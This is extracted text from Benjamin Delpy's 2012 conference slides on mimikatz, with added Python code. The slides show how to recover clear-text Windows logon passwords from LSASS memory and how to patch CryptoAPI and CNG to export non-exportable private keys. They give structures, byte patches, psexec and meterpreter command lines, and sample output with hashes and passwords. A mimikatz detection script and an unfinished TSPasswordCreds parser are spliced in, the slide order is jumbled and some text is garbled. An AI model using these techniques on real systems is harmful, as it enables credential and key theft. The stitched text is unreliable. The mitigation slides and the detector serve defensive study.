– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– SpAcceptCredentials takes the clear password in its arguments
• Protects it with LsaProtectMemory
• Updates or inserts data in the doubly linked list wdigest!l_LogSessList
.text:7409D151 _DigestCalcHA1@8           call dword ptr [eax+0B4h]
.text:74096C69 _SpAcceptCredentials@16    call dword ptr [eax+0B0h]
mimikatz # sekurlsa :: wdigest / workflow
Workflow (from the slide diagram): LsaEnumerateLogonSessions -> for each LUID -> search the wdigest!l_LogSessList linked list for the LUID -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory -> password in clear.
typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    […]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz # sekurlsa :: wdigest / demo time
sekurlsa::wdigest
mimikatz # sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz # sekurlsa :: livessp / how?
Actually, I've only used a logical (empirical) approach to search for passwords…
– Protocol reading
– Symbols searching
~ Boring ~… be more brutal this time: make a WinDbg trap!
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe

0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz # sekurlsa :: livessp / how?
Let's log in with a Live account on Windows 8.
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Breakpoint hits on lsasrv!LsaProtectMemory (kc 5 stacks, innermost frame first):
lsasrv!LsaProtectMemory <- livessp!LiveMakeSupplementalCred <- livessp!LiveMakeSecPkgCredentials <- livessp!LsaApLogonUserEx2 <- livessp!SpiLogonUserEx2
lsasrv!LsaProtectMemory <- msv1_0!NlpAddPrimaryCredential <- msv1_0!SspAcceptCredentials <- msv1_0!SpAcceptCredentials
lsasrv!LsaProtectMemory <- tspkg!TSHidePassword <- tspkg!SpAcceptCredentials
1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  […]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
Our LiveSSP provider!
Yeah, Pass the Hash capability with Live accounts too…
Live users can log on through RDP via SSO
mimikatz # sekurlsa :: livessp / workflow
Workflow (from the slide diagram): LsaEnumerateLogonSessions -> for each LUID -> search the livessp!LiveGlobalLogonSessionList linked list for the LUID -> KIWI_LIVESSP_LIST_ENTRY -> suppCreds -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear.
typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz :: sekurlsa :: kerberos (nt5) - workflow (slide 29)
Workflow:
    LsaEnumerateLogonSessions
      -> for each LUID
      -> kerberos!KerbLogonSessionList: search the linked list for the LUID
      -> LsaUnprotectMemory
      -> password in clear

    typedef struct _KIWI_KERBEROS_LOGON_SESSION {
        struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
        struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
        DWORD UsageCount;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        DWORD unk3;
        DWORD unk4;
        PVOID unk5;
        PVOID unk6;
        PVOID unk7;
        LUID LocallyUniqueIdentifier;
    #ifdef _M_IX86
        DWORD unk8;
    #endif
        DWORD unk9;
        DWORD unk10;
        PVOID unk11;
        DWORD unk12;
        DWORD unk13;
        PVOID unk14;
        PVOID unk15;
        PVOID unk16;
        /* [...] */
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa - demo time (slide 30)
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos - “hu?” (slide 31)
Ok, it works…
But why?
Not at all logons on NT5 (it can need an unlock)
From my understanding of Microsoft explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logic…
– For password auth:
  • password hash for shared secret, but keeping the password in memory
– For full smartcard auth:
  • No password on client
  • No hash on client
  – NTLM hash on client…
  – KDC sent it back as a gift
mimikatz :: sekurlsa (slide 32)
All passwords in memory are encrypted, but in a reversible way, so they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) in the LSASS process, to take benefit of its keys when we called it.
Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading memory of the LSASS process…
mimikatz can use lsasrv.dll too, and “imports” the keys initialized by LSASS
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
mimikatz :: sekurlsa - LsaEncryptMemory NT5 (slide 33)
Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx
Keys held by lsasrv in the LSASS process, copied by mimikatz into its own loaded lsasrv (lsass/lsasrv -> copy… -> mimikatz/lsasrv):
    g_cbRandomKey : DWORD (256)
    g_pRandomKey  : BYTE[g_cbRandomKey]
    g_pDESXKey    : BYTE[144]
    g_Feedback    : BYTE[8]
mimikatz :: sekurlsa - LsaEncryptMemory NT6 (slide 34)
Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
Keys held by lsasrv in the LSASS process, copied by mimikatz (lsass/lsasrv -> copy… -> mimikatz):
    InitializationVector : BYTE[16]
    h3DesKey             : PKIWI_BCRYPT_KEY
    hAesKey              : PKIWI_BCRYPT_KEY

    typedef struct _KIWI_BCRYPT_KEY_DATA {
        DWORD size;
        DWORD tag;
        DWORD type;
        DWORD unk0;
        DWORD unk1;
        DWORD unk2;
        DWORD unk3;
        PVOID unk4;
        BYTE data[]; /* etc. */
    } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

    typedef struct _KIWI_BCRYPT_KEY {
        DWORD size;
        DWORD type;
        PVOID unk0;
        PKIWI_BCRYPT_KEY_DATA cle;
        PVOID unk1;
    } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa - memo (slide 35)
Security Packages
    Package          Symbols                                Type
    tspkg            tspkg!TSGlobalCredTable                RTL_AVL_TABLE
    wdigest          wdigest!l_LogSessList                  LIST_ENTRY
    livessp          livessp!LiveGlobalLogonSessionList     LIST_ENTRY
    kerberos (nt5)   kerberos!KerbLogonSessionList          LIST_ENTRY
    kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable   RTL_AVL_TABLE
    msv1_0           lsasrv!LogonSessionList                LIST_ENTRY
                     lsasrv!LogonSessionListCount           ULONG
Protection Keys
    Key    NT 5 Symbols
    RC4    lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
    DESx   lsasrv!g_pDESXKey, lsasrv!g_Feedback

    Key    NT 6 Symbols
           lsasrv!InitializationVector
    3DES   lsasrv!h3DesKey
    AES    lsasrv!hAesKey
mimikatz :: sekurlsa - memo (slide 36)
Some commands:
    mimikatz # privilege::debug
    mimikatz # sekurlsa::logonPasswords full
    mimikatz # exit

    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit

    meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
Sample output:
    mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */   // http://blog.gentilkiwi.com/mimikatz

    mimikatz # privilege::debug
    Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

    mimikatz # sekurlsa::logonPasswords full
    Authentification Id        : 0;234870
    Package d'authentification : NTLM
    Utilisateur principal      : Gentil Kiwi
    Domaine d'authentification : vm-w8-rp-x
            msv1_0 :
             * Utilisateur  : Gentil Kiwi
             * Domaine      : vm-w8-rp-x
             * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
             * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
            kerberos :
             * Utilisateur  : Gentil Kiwi
             * Domaine      : vm-w8-rp-x
             * Mot de passe : waza1234
            wdigest :
             * Utilisateur  : Gentil Kiwi
             * Domaine      : vm-w8-rp-x
             * Mot de passe : waza1234
            tspkg :
             * Utilisateur  : Gentil Kiwi
             * Domaine      : vm-w8-rp-x
             * Mot de passe : waza1234
            livessp :
             n.t. (LUID KO)
mimikatz :: sekurlsa - what we can do (slide 37)
Basics:
– No physical access to the computer (first step to pass-the-hash, then pass-the-pass)
– No admin rights, system rights, debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass-the-hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks
More in depth:
– Force strong authentication (SmartCard & Token) $ / €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Take opportunities to stop retro-compatibility
– Disable faulty providers:
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
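The "Audit" advice above is actionable on the command lines the memo slide shows: mimikatz is driven by a `module::command` syntax (privilege::debug, sekurlsa::logonPasswords, crypto::exportKeys) that survives renaming the binary, and the psexec variant runs it as SYSTEM from the PsExec service. The following is an added detection example, not code from the slides or from mimikatz: it scans constructed process-creation records (field names modelled loosely on Windows event 4688 / Sysmon event 1, the events themselves invented for this example) and returns alerts. The module list is taken from the module names on these slides; the certutil rule is a deliberately low-confidence indicator that needs correlation with who ran it.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events (none are real log records). Field
# names loosely follow Windows event 4688 / Sysmon event 1.
SAMPLE_EVENTS = [
    {"host": "vm-w8-rp-x", "user": "vm-w8-rp-x\\gentilkiwi",
     "parent": "C:\\Windows\\explorer.exe", "image": "C:\\tools\\mimikatz.exe",
     "cmdline": 'mimikatz.exe privilege::debug "sekurlsa::logonPasswords full" exit'},
    # Renamed binary, launched as SYSTEM by the PsExec service: the
    # module::command syntax still gives it away.
    {"host": "srv01", "user": "NT AUTHORITY\\SYSTEM",
     "parent": "C:\\Windows\\PSEXESVC.exe", "image": "C:\\Windows\\m.exe",
     "cmdline": "m.exe crypto::patchcng crypto::exportKeys computer exit"},
    {"host": "ws42", "user": "corp\\alice",
     "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Program Files\\Notepad++\\notepad++.exe",
     "cmdline": '"C:\\Program Files\\Notepad++\\notepad++.exe" notes.txt'},
    {"host": "ws42", "user": "corp\\bob",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil -user -p x -privatekey -exportpfx cng_user_noexport out.pfx"},
]

# mimikatz modules named on the slides; the command syntax is module::command.
MIMIKATZ_MODULES = {"sekurlsa", "privilege", "crypto", "inject", "samdump",
                    "divers", "nogpo", "standard", "handle", "service"}
MODULE_CMD_RE = re.compile(r"\b([a-z0-9_]+)::([a-z0-9_]+)", re.IGNORECASE)


@dataclass
class Alert:
    host: str
    user: str
    reason: str
    cmdline: str


def classify(event: dict) -> list:
    """Return the list of reasons this event is suspicious (empty if none)."""
    reasons = []
    cmd = event["cmdline"]
    for mod, sub in MODULE_CMD_RE.findall(cmd):
        if mod.lower() in MIMIKATZ_MODULES:
            reasons.append(f"mimikatz module syntax {mod}::{sub}")
    # Process spawned by the PsExec service and running as SYSTEM
    # (the "psexec \\host -s" pattern from the memo slide).
    if event["parent"].lower().endswith("psexesvc.exe") and "SYSTEM" in event["user"].upper():
        reasons.append("SYSTEM process spawned by PSEXESVC")
    # Low-confidence: private key export with certutil (legitimate admins do this too).
    low = cmd.lower()
    if event["image"].lower().endswith("certutil.exe") and "-exportpfx" in low and "-privatekey" in low:
        reasons.append("certutil private key export")
    return reasons


def scan(events: list) -> list:
    """Run classify() over every event and flatten the result into Alert records."""
    alerts = []
    for ev in events:
        for reason in classify(ev):
            alerts.append(Alert(ev["host"], ev["user"], reason, ev["cmdline"]))
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.host}] {a.user}: {a.reason} <- {a.cmdline}")
```

Matching on the argument syntax rather than on the file name is the point: the second constructed event renames mimikatz.exe to m.exe and still produces three alerts, while the notepad++ event produces none.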
mimikatz :: crypto - what is it? (slide 38)
A little module that I wrote to:
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • Even those which are “not” exportable
What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again?)
mod_mimikatz_crypto
mimikatz :: crypto - how it's protected (slide 39)
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or password of the users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a “session”
Export/Usage can be limited by:
– Password
– Popup
  (Password and Popup: a constraint for most users, unavailable for computer keys)
– Export/Archive flag not present
    certutil -importpfx mycert.p12 NoExport
    certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi - how it works (slide 40)
“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware.”
– http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi - how it's exported (PLAYSKOOL level) (slide 41)
Process (CryptoAPI and RSA CSP):
    Ask to export Key -> Exportable?
      yes -> DPAPI Decode -> Load Private Key -> Exported Key
      no  -> NTE_BAD_KEY_STATE
mimikatz :: crypto :: patch capi - because I own my process (slide 42)
When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey
This function does all the work to prepare the export, and checks if the key is exportable:
    mimikatz # crypto::exportCertificates
    Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
     - Benjamin Delpy
            Container Clé : 470ADFBA-8718-4014-B05E-B30776B75A03
            Provider      : Microsoft Enhanced Cryptographic Provider v1.0
            Type          : AT_KEYEXCHANGE
            Exportabilité : NON
            Taille clé    : 2048
            Export privé dans  'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
            Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

    ================ Certificat 0 ================
    Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
    Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
    Objet : CN=Benjamin Delpy, C=FR
    Il ne s'agit pas d'un certificat racine
    Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
      Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
      Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
    La clé privée NE PEUT PAS être exportée
    Succès du test de cryptage
    CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
    CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz :: crypto :: patch capi - because I own my process (slide 43)
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote “4” bytes in my memory space:
    .text:0AC0B7CB 0F 85 33 C7 FF FF    jnz     continue_key_export_or_archive
    .text:0AC0B7CB 90                   nop
    .text:0AC0B7CC E9 33 C7 FF FF       jmp     continue_key_export_or_archive

    .text:0AC1F749 0F 85 B6 3B FF FF    jnz     continue_key_export_or_archive_prepare
    .text:0AC1F749 90                   nop
    .text:0AC1F74A E9 B6 3B FF FF       jmp     continue_key_export_or_archive_prepare
mimikatz :: crypto :: patch capi - demo time (slide 44)
Import, export, import as not exportable… export!
mimikatz :: crypto :: patch capi - limitations (slide 45)
Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real life use
  • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng - how it works (slide 46)
“Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.”
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
“To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default.”
This time, key operations are not made in the “user” process context
The process uses RPC to call “Key isolation service” (keyiso) functions
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz :: crypto :: cng - how it's exported (PLAYSKOOL level) (slide 47)
Process (CNG):
    Ask to export Key  --RPC-->  KeyIso Service (LSASS Process)
KeyIso Service (LSASS Process; NT6: System protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP):
    Exportable?
      yes -> DPAPI Decode -> Load Private Key -> Exported Key
      no  -> NTE_NOT_SUPPORTED
mimikatz :: crypto :: patch cng - because sometimes I own LSASS (slide 48)
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass(keyiso)!ncrypt!SPCryptExportKey
This function does all the work to prepare the export, and checks if the key is exportable:
    mimikatz # crypto::exportKeys
    [user] Clés CNG :
     - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
            Exportabilité : NON
            Taille clé    : 2048
            Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
            mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patch cng - because sometimes I own LSASS (slide 49)
This time, checks and keys are in the LSASS process… And what?
I wrote “1” byte in LSASS memory space…
    .text:6C815210 75 1C    jnz     short continue_key_export
    .text:6C815210 EB 1C    jmp     short continue_key_export
mimikatz :: crypto :: patch cng - demo time (slide 50)
Import, export, import as not exportable… export, again!
mimikatz :: crypto :: patch cng - limitations (slide 51)
Patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…
mimikatz :: crypto :: patch cng - bonus (slide 52)
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for export can work too
– Yeah, like the good old certutil
Before the patch:
    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
    MY
    ================ Certificat 1 ================
    […]
    Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Fournisseur = Microsoft Software Key Storage Provider
    La clé privée NE PEUT PAS être exportée
    Succès du test de chiffrement
    CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
    CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
After the patch:
    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
    MY
    ================ Certificat 1 ================
    […]
    Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Fournisseur = Microsoft Software Key Storage Provider
    Succès du test de chiffrement
    CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto - memo (slide 53)
Some commands:
    mimikatz # crypto::patchcapi
    mimikatz # crypto::exportCertificates
    mimikatz # exit

    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit

    mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"

    mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto - what we can do (slide 54)
Exactly the same as for sekurlsa: it will prevent access to accounts/computer – no admin, no admin, no admin…
Basics:
– Use smartcards/tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth:
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz - what else can it do? (slide 55)
– Play with minesweeper
– Manipulate some handles
– Pass the hash
– Dump SAM / AD
– Stop event monitoring
– Patch Terminal Server
– Basic GPO bypass
– Applocker / SRP bypass
– Driver
  – Play with tokens & privileges
  – Display SSDT x86 & x64
  – List minifilters actions
  – List Notifications (process, thread, image, registry)
  – List Objects hooks and procedures
  – …
– …
mimikatz - that's all folks (slide 56)
Thanks to / Merci à:
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact (slide 57)
blog:     http://blog.gentilkiwi.com/
mimikatz: http://blog.gentilkiwi.com/mimikatz
source:   https://code.google.com/p/mimikatz/
email:    benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: tspkg (slide 10)
because sometimes hash is not enough…
mimikatz :: sekurlsa :: tspkg - what is it? (slide 11)
Microsoft introduced SSO capability for Terminal Server with NT 6, to improve RemoteApps and RemoteDesktop users' experience
– http://technet.microsoft.com/library/cc772108.aspx
It relies on CredSSP with Credentials Delegation (= Account delegation)
– Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression: it seems cool!
– User does not have to type its password
– Password is not in the RDP file
– Password is not in user secrets
mimikatz :: sekurlsa :: tspkg - questions (slide 12)
The KB says that for it to work we must enable « Default credentials » delegation
– “Default credentials: The credentials obtained when the user first logs on to Windows” - https://msdn.microsoft.com/library/bb204773.aspx
  • What? Our User/Domain/Password? | Hash? | Ticket? It seems…
– In all cases the system seems to be vulnerable to pass-the-…
In what form? Our specs: [MS-CSSP]
– 2.2.1.2.1 TSPasswordCreds
  • The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN).
        TSPasswordCreds ::= SEQUENCE {
            domainName  [0] OCTET STRING,
            userName    [1] OCTET STRING,
            password    [2] OCTET STRING
        }
– Challenge response for authentication?
  • Server: YES (TLS, Kerberos)
  • Client: NO, password is sent to server…
So, the password resides somewhere in memory!
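To make the point of the slide concrete, here is an added example (not from the slides, not from mimikatz) that encodes and decodes the TSPasswordCreds SEQUENCE above in DER. It assumes the usual CredSSP encoding conventions: explicit context tags ([0], [1], [2]) wrapping an OCTET STRING, with the text carried as UTF-16LE; the sample domain, user and password values are constructed. Decoding shows the structure carries the password itself, not a hash: only the TLS channel around it protects it on the wire, and the client must hold the clear password to build it.

```python
# Minimal DER encoder/decoder for TSPasswordCreds ([MS-CSSP] 2.2.1.2.1).
# Assumption (restated from the lead-in): explicit context tags, OCTET STRING
# payloads, UTF-16LE text.

FIELD_NAMES = {0: "domainName", 1: "userName", 2: "password"}


def _der_len(n: int) -> bytes:
    """DER length: short form below 128, long form (0x8N + N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _der_len(len(body)) + body


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    """TSPasswordCreds ::= SEQUENCE { [0] OCTET STRING, [1] OCTET STRING, [2] OCTET STRING }."""
    fields = []
    for idx, value in enumerate((domain, user, password)):
        octets = _tlv(0x04, value.encode("utf-16-le"))     # OCTET STRING
        fields.append(_tlv(0xA0 | idx, octets))           # [idx] EXPLICIT (constructed, context)
    return _tlv(0x30, b"".join(fields))                   # SEQUENCE


def _read_tlv(buf: bytes, pos: int):
    """Read one TLV at pos; return (tag, value, position after it)."""
    tag = buf[pos]
    pos += 1
    length = buf[pos]
    pos += 1
    if length & 0x80:                                     # long form
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[pos:pos + length], pos + length


def decode_ts_password_creds(blob: bytes) -> dict:
    """Parse a DER TSPasswordCreds and return its three fields as text."""
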